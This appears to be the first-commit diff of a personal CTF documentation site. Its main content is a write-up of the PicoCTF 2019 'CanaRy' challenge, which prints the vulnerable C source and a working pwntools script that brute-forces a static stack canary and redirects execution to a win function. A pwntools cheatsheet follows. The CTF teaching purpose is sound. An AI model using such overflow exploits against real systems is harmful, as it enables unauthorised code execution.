first commit

README.md

@@ -0,0 +1 @@
+# CTF Docs

docs/assets/js/config.js

@@ -0,0 +1,4 @@
+document$.subscribe(() => {
+  hljs.highlightAll()
+})
+

docs/index.md

@@ -0,0 +1,17 @@
+---
+title: Welcome to CTF Docs
+description: Cheatsheets and write ups about pentest and CTF.
+---
+
+# Welcome to CTF Docs
+
+## Introduction
+
+In this website, you will find awesome **cheatsheets** about tools I use during pentest and CTF. Moreover, you will find plenty of **CTF write ups** sorted by difficulty.
+
+!!! note ""
+    The documentation is constantly evolving so do not forget to **bookmark this website**.
+
+## Whoami
+
+A french student passionate about infosec.

docs/pwn/buffer-overflow/static-canary.md

@@ -0,0 +1,156 @@
+---
+title: Static Canary
+description: Exploiting a buffer overflow attack with a static canary.
+---
+
+# Buffer Overflow - Static Canary
+
+## Summary
+
+Exploiting a buffer overflow attack with a static canary.
+
+## Challenge
+
+### Statement
+
+!!! note ""
+    Challenge : CanaRy from PicoCTF 2019.
+
+This time we added a canary to detect buffer overflows. Can you still find a way to retrieve the flag from this program.
+
+### Source code
+
+```c linenums="1"
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+#define CANARY_SIZE 4
+
+void win() {
+  char buf[FLAGSIZE];
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
+    exit(0);
+  }
+
+  fgets(buf,FLAGSIZE,f);
+  puts(buf);
+  fflush(stdout);
+}
+
+char global_canary[CANARY_SIZE];
+void read_canary() {
+  FILE *f = fopen("canary.txt","r");
+  if (f == NULL) {
+    printf("Canary is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
+    exit(0);
+  }
+
+  fread(global_canary,sizeof(char),CANARY_SIZE,f);
+  fclose(f);
+}
+
+void vuln(){
+   char canary[CANARY_SIZE];
+   char buf[BUFSIZE];
+   char length[BUFSIZE];
+   int count;
+   int x = 0;
+   memcpy(canary,global_canary,CANARY_SIZE);
+   printf("How Many Bytes will You Write Into the Buffer?\n> ");
+   while (x<BUFSIZE) {
+      read(0,length+x,1);
+      if (length[x]=='\n') break;
+      x++;
+   }
+   sscanf(length,"%d",&count);
+
+   printf("Input> ");
+   read(0,buf,count);
+
+   if (memcmp(canary,global_canary,CANARY_SIZE)) {
+      printf("*** Stack Smashing Detected *** : Canary Value Corrupt!\n");
+      exit(-1);
+   }
+   printf("Ok... Now Where's the Flag?\n");
+   fflush(stdout);
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  int i;
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  read_canary();
+  vuln();
+  return 0;
+}
+```
+
+## Answer
+
+In the source code below, the canary is load from a text file and is only four bytes, `#define CANARY_SIZE 4`.
+
+So, we can bruteforce it. The good way to do it, it's by bruteforcing the canary one byte at a time.
+
+!!! example
+    padding + 'a' : Stack Smashing Detected -> The canary is NOT starting by the letter 'a'.<br>
+    padding + 'b' : Stack Smashing Detected -> The canary is NOT starting by the letter 'b'.<br>
+    ...<br>
+    padding + 'o' : Ok... Now Where'''s the Flag? -> The canary is starting by the letter 'o'.<br>
+    Then, you go on with : 'oa', 'ob', 'oc', ... until you get the four bytes.
+
+Once you retrieve the whole canary, you now can jump to the *win* function.
+
+Let's make a python script with *pwntools* to flag this challenge :
+
+```python linenums="1"
+#!/usr/bin/env python3
+from string import printable
+from pwn import process, p32, context, ELF
+
+context.log_level = "error"
+
+elf = ELF('./vuln')
+win_func_addr = p32(elf.symbols['win'])
+padding = 32 * "A"
+
+
+def retrieve_canary():
+    canary = ""
+
+    for i in range(4):
+        for c in printable.replace("\n", ""):
+            p = process("./vuln")
+            p.sendlineafter("Buffer?\n> ", str(len(padding + canary + c)))
+            p.sendlineafter("Input> ", padding + canary + c)
+
+            data = p.recvline()
+            if not "Stack Smashing Detected" in data.decode("utf-8"):
+                canary += c
+                break
+
+    return canary
+
+
+if __name__ == "__main__":
+    canary = retrieve_canary()
+    payload = (padding + canary + "A" * 16).encode() + win_func_addr
+
+    p = process("./vuln")
+    p.sendlineafter("Buffer?\n> ", str(len(payload)))
+    p.sendlineafter("Input> ", payload)
+    p.interactive()
+```

docs/pwn/pwntools.md

@@ -0,0 +1,61 @@
+# Pwntools
+
+![pwntools logo](https://github.com/Gallopsled/pwntools/blob/stable/docs/source/logo.png?raw=true)
+
+Pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.
+
+- [Github](https://github.com/Gallopsled/pwntools)
+- [Official docs](https://docs.pwntools.com/en/latest/)
+
+## Basic
+
+``` python
+context(arch="arm", os="linux", endian="big", log_level="debug")
+```
+
+## Process / Remote
+
+``` python
+# Local
+p = process("./pwn")
+
+# Remote
+r = remote("ftp.example.com", 21)
+r = remote("ctf.example.com", 1337)
+
+# SSH
+s = ssh(host="ctf.example.com", port=22,
+	user="ssh_username", password="ssh_password")
+sh = s.process('/challenges/vuln')
+```
+
+## Receive / Send
+
+``` python
+p = process("./pwn")
+
+p.recv(numb = 4096, timeout = default)
+p.recvuntil(delims, drop=False, timeout = default)
+p.recvn(numb, timeout = default)
+p.recvlines(numlines, keepends = False, timeout = default)
+p.recvline(keepends = True, timeout = default)
+p.recvregex(regex, exact = False, timeout = default)
+p.recvrepeat(timeout = default)  # Receives data until a timeout or EOF is reached.
+p.recvall(self, timeout=Timeout.forever)  # Receives data until EOF is reached.
+p.send(data)
+p.sendline(line)
+p.sendlineafter(pattern, data)
+p.interactive()
+```
+
+## Listen
+
+``` python
+l = listen(port=1337, bindaddr = "0.0.0.0")
+c = l.wait_for_connection()
+c.recv()
+```
+
+### References
+
+- [http://blog.eadom.net/uncategorized/pwntools-quick-reference-guide/](http://blog.eadom.net/uncategorized/pwntools-quick-reference-guide/)

mkdocs.yml

@@ -0,0 +1,46 @@
+site_name: CTF Docs
+theme:
+  name: material
+  favicon: assets/img/favicon.ico
+  logo: assets/img/favicon.ico
+  icon:
+    repo: fontawesome/brands/gitlab
+  palette:
+    - scheme: default
+      primary: black
+      accent: red
+      toggle:
+        icon: material/toggle-switch-off-outline
+        name: Switch to dark mode
+    - scheme: slate
+      primary: black
+      accent: red
+      toggle:
+        icon: material/toggle-switch
+        name: Switch to light mode
+
+repo_url: https://gitlab.com/xanhacks/ctf-docs
+repo_name: xanhacks/ctf-docs
+
+extra:
+  homepage: https://docs.xanhacks.xyz
+  social:
+    - icon: fontawesome/brands/twitter
+      link: https://twitter.com/xanhacks
+    - icon: fontawesome/brands/gitlab
+      link: https://gitlab.com/xanhacks
+    - icon: fontawesome/solid/globe
+      link: https://xanhacks.xyz
+
+
+markdown_extensions:
+  - pymdownx.highlight
+  - pymdownx.superfences
+  - meta
+  - admonition
+
+extra_javascript:
+  - https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/highlight.min.js
+  - assets/js/config.js
+extra_css:
+  - https://cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.2/styles/default.min.css